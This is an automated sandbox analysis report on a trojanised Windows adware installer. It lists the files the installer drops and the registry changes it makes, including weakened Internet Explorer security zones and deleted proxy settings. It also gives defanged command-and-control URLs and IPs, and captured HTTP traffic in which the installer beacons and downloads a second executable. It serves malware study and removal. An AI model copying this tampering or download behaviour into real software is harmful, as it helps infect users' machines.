Installer.Win32.InnoSetup.2.FD, Trojan.Win32.Sasfis.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Installer
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9bd659f802479a9bf3ccf7545ef9a1e4
SHA1: 41cd20bab6628573148e52c30844357ca5d7745e
SHA256: b09ddb4e12cad384e8be48365ce6c205bd1c93a37ef85a5975d8d7c1677c9ca4
SSDeep: 24576:qiTAj2NdhIAtyY5pXKBOTH/XXvfmUDDhjqUPhZHZxWPY4h/2:qiMG9tyoxA8HfnmUPhjRbZxT4h
Size: 1010192 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: adsafiliados
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Installer. An installation package.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Installer creates the following process(es):No processes have been created.The Installer injects its code into the following process(es):
%original file name%.exe:1676
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1676 makes changes in the file system.
The Installer creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB319.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0F6.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\bootstrap_34203.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2FA.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\logo4[1].jpg (1041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Pause_Button.png (577 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The Installer deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\000CB319.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0F6.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2FA.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\bootstrap_34203.html (0 bytes)
Registry activity
The process %original file name%.exe:1676 makes changes in the system registry.
The Installer creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 77 53 67 3C 22 1E 2B EC 1F 37 5D D5 EF 37 37"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Installer modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Installer modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Installer modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Installer deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
cff4e84c73ced3564f31f78eba726d61 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
- Delete the original Installer file.
- Delete or disinfect the following files created/modified by the Installer:
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\csshover3.htc (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button_Hover.png (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\ie6_Dlm_main.css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Loader.gif (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\sponsored.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB319.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\ES.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressBarD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB0F6.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\EN.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\in1A1AEB34\760B5545_stp.DAT.part (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg2.png (978 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\ProgressD.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Welcome_BG.jpg (18 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\button.css (417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\mainDlm.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\bootstrap_34203.html (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close.png (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\BGD.jpg (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\locale\DLM\PT.locale (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Color_Button.png (385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\progress-bar.css (506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Resume_Button.png (718 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2FA.log (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\form.bmp.Mask (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\logo4[1].jpg (1041 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\browse.css (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Pause_Button.png (577 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\images\Close_Hover.png (170 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adswarez[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\checkbox.css (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inH83173444516\css\sdk-ui\images\button-bg.png (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: adsafiliados
Product Name: Installer Setup
Product Version: 1.0.5.a0.1_54944
Legal Copyright: adsafiliados
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.5.a0.1_54944
File Description: Installer Setup
Comments: This installation was built with Inno Setup.
Language: English (United States)
Company Name: adsafiliadosProduct Name: Installer SetupProduct Version: 1.0.5.a0.1_54944Legal Copyright: adsafiliadosLegal Trademarks: Original Filename: Internal Name: File Version: 1.0.5.a0.1_54944File Description: Installer SetupComments: This installation was built with Inno Setup.Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 40240 | 40448 | 4.64999 | dbda5ee849ef82a713855f811e7bfc14 |
DATA | 45056 | 592 | 1024 | 1.90742 | 1ee71d84f1c77af85f1f5c278f880572 |
BSS | 49152 | 3724 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 53248 | 2384 | 2560 | 3.07115 | bb5485bf968b970e5ea81292af2acdba |
.tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 61440 | 24 | 512 | 0.14174 | 9ba824905bf9c7922b6fc87a38b74366 |
.reloc | 65536 | 2244 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 69632 | 11264 | 11264 | 3.10173 | 85e26c316dd351fa3b841914fb7ded69 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 25
da572766f44e7b5b01f230f184e2be6b
961c4435451cc147d6d3bfd59f8d4624
e6a69a7ba36c7be2ff8ca7e7e79e4038
28422dba23ed1f0a4e7be424f69bfc09
20af91ce088b16d260ed76a2614037b0
5c58c121061e8f79f3885326d8c5cb29
f1103ef51e63250cd835b8ad507dd24c
d0d8cec2d646fa7a0fb6c79d44e3b960
f762441fab5467efeabfaea3685f1806
6899505489192a5a9df7b30ee0babfaf
dc5a034db8ab7049dc5f37a17ebcb9d9
8ba398b18d09d8415a60149a70c535bd
eaeed4183ff17edc4384e353f43a76e1
a7a4010bdab7a0a66b95cb20b9fa0c3d
b3d549f05a832980a905d1b3a9f2a5ae
415bf2b54ca511831edeb9c21e2645e4
296174c8438a132b37a6b89d2dd61a50
4954d37f1446ae2dca81f1695d18190f
b162d3e830ee3694a36cf947f0d77709
1d5a622fedabcbd02b2677486b01fd4a
992848a79a13ecc7b491b8723311b73c
941bc0a52a496fe0ee77cece39d37d45
0869e43da1d44f256fa7fdf02f5743ad
c088309e24bea1c8893ed8b009d1e3ec
7f1ba36097afd10c60a316a734514982
Network Activity
URLs
URL | IP |
---|---|
hxxp://info.fodidodasal.com/?v=1.03&c=4dda1ae4&at=86346066&cntr=0 | 54.154.229.88 |
hxxp://ad5.adswarez.com/downloadimage/1264/13/d99394816486d094825965657734c00d/logo4.png?logotipo=automatico&uo=hxxp://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&nada=true | 104.28.17.74 |
hxxp://os.fodidodasal.com/adsafiliados/?v=6.0&c=325067414&t=834562 | 52.31.134.147 |
hxxp://rp.fodidodasal.com/?v=2.0&subver=6.21&pcrc=745675320 | 54.247.170.90 |
hxxp://rp.fodidodasal.com/?v=2.0&subver=6.21&pcrc=198775596 | 54.247.170.90 |
hxxp://ad5.adswarez.com/comp/1264/13/gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI.exe?plataforma=c1&&uo=hxxp://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&ud=hxxp://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html | 104.28.17.74 |
hxxp://162.243.100.13/?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://www.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em Português-BR (32 e 64 Bits) - PH Downs | |
hxxp://rp.Fodidodasal.com/?v=2.0&subver=6.21&pcrc=198775596 | |
hxxp://os.Fodidodasal.com/adsafiliados/?v=6.0&c=325067414&t=834562 | |
hxxp://info.Fodidodasal.com/?v=1.03&c=4dda1ae4&at=86346066&cntr=0 | |
hxxp://rp.Fodidodasal.com/?v=2.0&subver=6.21&pcrc=745675320 | |
img.fodidodasal.com | 146.185.27.45 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /adsafiliados/?v=6.0&c=325067414&t=834562 HTTP/1.1
Accept: */*
Host: os.Fodidodasal.com
User-Agent: ICAS
Content-Length: 1232
Cache-Control: no-cache
.I..~...$$........FI ..B.s.8...H.,..1....w.J.......u3.2.;....O0,.b.5..S.eGw..6....T... .<l..Qvo.Q...U.arE.w..;......[2....0.d.^q...J...
.Rl)"..fq...q}..>...c.. an.>.7.0.P$i.>M m!.....V..X....~.^JHe.4..S..`gC......#.............@-~.-c....7............%.c..Id...Fa..C..B.8../.E..L....A@..w.LP..t1{g....M.T...a...H......`..?...lA.[N..g...iMK.s.b0z..A
.j.s.......F1.yf......z.......l..w.c..].].f..2....vW....a...?.,....M=.Y..
....." ....b...n..p.%....qe...z:.6k........4i.@g...B.E.'.y.,...-....M..4z
~&...r.........U.O-.\....R.>.3B..J."l.^[v....\....... U....S#v...b..Yd..d/..Vj.......p.G....<..O.V.._.L'..Ml...D..<2......WM.D..x..H.e.Z5..^m.u..T.N.....^.^....~..0$.W.t.z.h...3P.j..u.S....qEx.|..SZ....Xd..r;0.U. ..5....h^.__1...].|...{.bH.. .|...Af~..*..].nB..c....(N(..#x{..8L.g.4..H...U...l.........|..B'a..a...-).2..{}.k...V.9......Zy...nvx....CX.pK
....Kd..C ./.r...]..0...J....M.G..1....!.........G.....3.<...3h I..%...8....c...1KU8..f.....}F.cPR>d~T_..O.i..W@..z...z`ZH..{........m. ......g=.......~......W.0'hD|A. ...al;.W...b.~.....s..P..u.sm.#.gn.o.c...&
..m..&..;.y@....~|..,.8-'$..El..Jk....M.......{..).].."..SJ.^......".*.vv..`..W.E.......A.......l...R3P..{@
RUK.....5....._X??U....2.^.......6h-....w
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 02 May 2016 04:59:26 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: nginx
X-ICSCT-CC: UA
X-ICSCT-CITY: Kharkiv
X-ICSCT-GICSET: global13712aICBA
X-ICSCT-IP: 194.242.96.218
X-ICSCT-SERVER-NAME: ads.slave-131-prod-eu-west-1c-7202a8fa
X-ICSCT-TIMESTAMP: 20160501235926346
X-ICSCT-VERSION: 1.3.1
X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a
X-Robots-Tag: none
transfer-encoding: chunked
Connection: keep-alive
3a2..U.H.J[@.JX...(#>.}..-.J../R...r.?.V.}R.~.yI......\B...U..;A...Y67.J...T......G>..%0? ..q/..S....r5.......j..d[$.........!...).........}K}.2.Q.....3.....4......5.,h..N.\e..H.......JP................(....71U.2.q..A.:.|q&.|..2..=/..l.R.#w.E.IX...$.<..G..4...H}.o. i).L..<L.>.:....U.0....&..^...)....A..E..2......T...)..5.S....Gw..).8..xBM.....v..P"...=1;^x..4./:....<C.l.....U..).d..e../.....@.f....D......(.\s}...j.....u_d....."_i.H..........:......Y../..P........z/...0.....6>.?......V.a.x.....^t`.z6_........5.b.1........,q.%b..zL..e./.}...8n.....Q..h=....5............4....?.}......(5.o.....5...............0....4.....X.L(........8....}!..x..gw....t"z}.......3O.......w....... ...T.6$.......u......X.......H......?.......".....-......:.......\.......l5....d.4.:.(........5.....)........l.>,.....E....$e...yk.._<...I|...TfAZ$.g/c[.0.d..........H...k......M.........C.....nh.~.D.,.V.u.<..Yt.w..4..R..6...}%......x..y..$.@5.......p...1b56.....$.$....%..x.th.M....$Z.<...H.ZI...R..h0...(.4...:.T.$....g..I......d..~A.0~.L3.....E,..=...$....F..;..Z15_,.....W.....KP...~az4..fD...9......U;..!P=..L......XI.QU.....X..i$.... .MWGt..[.......l..$...>.^.gd...D..a...>...a.4.=.....S`N37\.........-"..d.vO.M@.ZO..`..{...p......G.0.E].6p.J...s..l..h..,Yq7...t;boq.S6.6eD.".)(k..f...5!.......R.F....t..!..Lh.IE!q....n...pp.......(.A> ?..).......p....$../@O.,...P.....FF...;B...S. ..........x..C..#y...N....G.....E~hM..~0...M....*.3....3<..mW...{.C.I..B........z.H..}...8.D....0....9.o..........-..\..
<<< skipped >>>
POST /?v=1.03&c=4dda1ae4&at=86346066&cntr=0 HTTP/1.1
Accept: */*
Host: info.Fodidodasal.com
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Content-Length: 172
Cache-Control: no-cache
6l7GU7LYt04pVHc/00d7Jmrpn1tMNl72DF45Dyd1Ek32k /ReSZh EZcO6iFesAKbPDUzJBKgPIbhzx9qgYGDw8OQJWdh3L vh4YX5Vq2Y2iXS7ZeACmfaQ9dpBAGIGeBAN5ZDioG u8AgiH85cu/m38AETLu5pIjyMbv4TI7U=
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Date: Mon, 02 May 2016 04:59:25 GMT
Content-Length: 2176
Connection: keep-alive
QvJ5xIEkV9Z/FFmDlcwMSQIKu6BUkU4J0RioqehpVC6ry5PpxymFaYSDthf FoSY9XbetRmgQtURPHIQHbbCIGDI3QuuWzTLdiMVZBM4EoroPJ0R6kXFGMQx9IBNIdGrfFC 4 ecocon1E9C/ggtnItl/Mjvu1aGWlNS2vVcrzXoUvLYVx4xVWM6i/Ce73jairNaWhW2rkhpZ7m3v4aBtv4CI yoBgOesqTRsFcgTrsQGjLMWbTXOEkk2y2FtxUB1DsWITpJVq5RHdTZ6NhFw6fwsM2b2fvU6RzQSzuygLJGN3CwJnR/cXaK7x/XdAYZVpTQA5oCG5jezZmue4EIXAwZyIJr746xz0O yGr7p2ZA3M2YjPWN1IMrXsFlMZP9u GqhfpgHszOd2JR1TGlCzOH4HGhm4Kwfu3JJdj6ZVaHylrm4vDzjoQcr2U4eYl82QHKHy/MFLBUMrKdzXlHcThbzj68oHlKT5d SJz6UNBEJS8F24NCt/H7b6fT Bl9ZLG8zzwhUhwpHpCQIBUl3uEVENpEXKa1RFGpanWvSiMu3eE6uvThvy4un SlniXRL7VbF3/qGTJVSFmsiYSQKrIwcleBon lok9kwxi2 K96SE5tMTX4BFurP84X gP8KjIE/VxV6mlm27spRXYBw2HRTNeXbwLb63pA9eQyUvNjkfVhKwjw9LrUitpokUUQCR2LYUJJN1MVh8ObFfTsFWE6WcjDjphl6bqQnn xnQHIgtNfOapxSpl1UmKuiF7HYBSACwngnIgnXVDhul1R6kqVU9gBa99gZ4WfFWKJjx8X8 XgwXf Y2oVgh76IBhAOeOOkdY1/oy6RKl5HBCRbKz9qqFbyXAkYqKQ1jveoJgCryoUFW1m VtD8NMtox5YSAz19dIvRVT4atT1PAb9SwBO7TMaIC0UsQAg7t iHvBhgxZEXiLfQfhbPJRs6noPoEz/Q/MJLcGfFOvjXjY3iPNtbiC6Q4JvRlXlQ8fe YPY2ckCeCGwJd/GAqRUIvLidKg6c28Pcf1gj9jcXIREevzfIehUi5YgdTNJIAmbkh/ gbvFyAQ7CUwUEfmZ6lHM2kG2kstkQRn/ggtCT/4cxOsuHiTjDupjklozz/2uTBbaM0o A2WU9DbKSmgT9de4Lx2VJSvQMR8s81WzzLkJ5uRy87WaATewSKa5NfCO2OmNIfO4WtrRifopoOfHs5zgHBCkuCZU4lT5OCfC1K1mW FZZw56JqIQv834OQeAIY3W3PywNxpXObEnSvvu4CUHVtE0EGmwqVeGpR3lu3s48MDv28Fh UMuBS/ExvYUyKvp3qK08NQEBAzlXYo5ikkUdump8LtaGdQ4pyxdBPKP0njKnPwf6lotsKmLIeeHIIk2gbXLYxDTK525nLI7Frez6SPXpQvP2rbONvnAiuk 9mHK6xQW3V257AZg//FNqUjD0pCbK9ovpQBo0EyNhrKl5o 2RePBQrGjqFGiet6DnzutaoRCRcpJuonh2Q8P7hFOEXDDEV0ZLvStqIIKhSSs
<<< skipped >>>
GET /?key=gtG2rKbuNMg1GVchjZwgdeTq7h_TCIbj1Cl8cvoyMgkoC_A_xvPRLBMB3M5I0ynPsu6w78k8y3KKV0HwXc1oQlbghJdPVQm5lSEqQAQ06hHhV5oKx3xRLGTukZL0u_qVAK_nb5yzewnExCzhkG1kw2iSeSdno8V_oQ_w3sxV92h2GanlkqvZwatfodFERoPu1XmTzND2RF5WfeeX9-EN5iyxZQiBFnH7OipMf4ZcL1dOtwM6uXF-Ik2w-u6nnVo5Rznm_4Q_uYHyQn9la_BNw8wiZ9hI1h9rzMLRB5VT6A3RweTFitFh-zsbL828qx_WfpDiokhnTvMKq5gVK5EbrfGHhNdMeeqQDJHi8Sqq-ok4HP4SIpyp0nXe8qyaAxBI&ud=http://VVV.phdowns.com/2015/09/office-2016-professional-plus-download-portugues.html&n=Office 2016 - Completo em Português-BR (32 e 64 Bits) - PH Downs HTTP/1.1
Range: bytes=0-60722
Accept: */*
Host: 162.243.100.13
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0; ICDM 2.1)
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 02 May 2016 04:59:29 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Content-Disposition: attachment; filename=pixel.exe
Content-Description: File Transfer
Content-Length: 60723
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t...........@...........................................................................p...............................text...L\.......^.................. 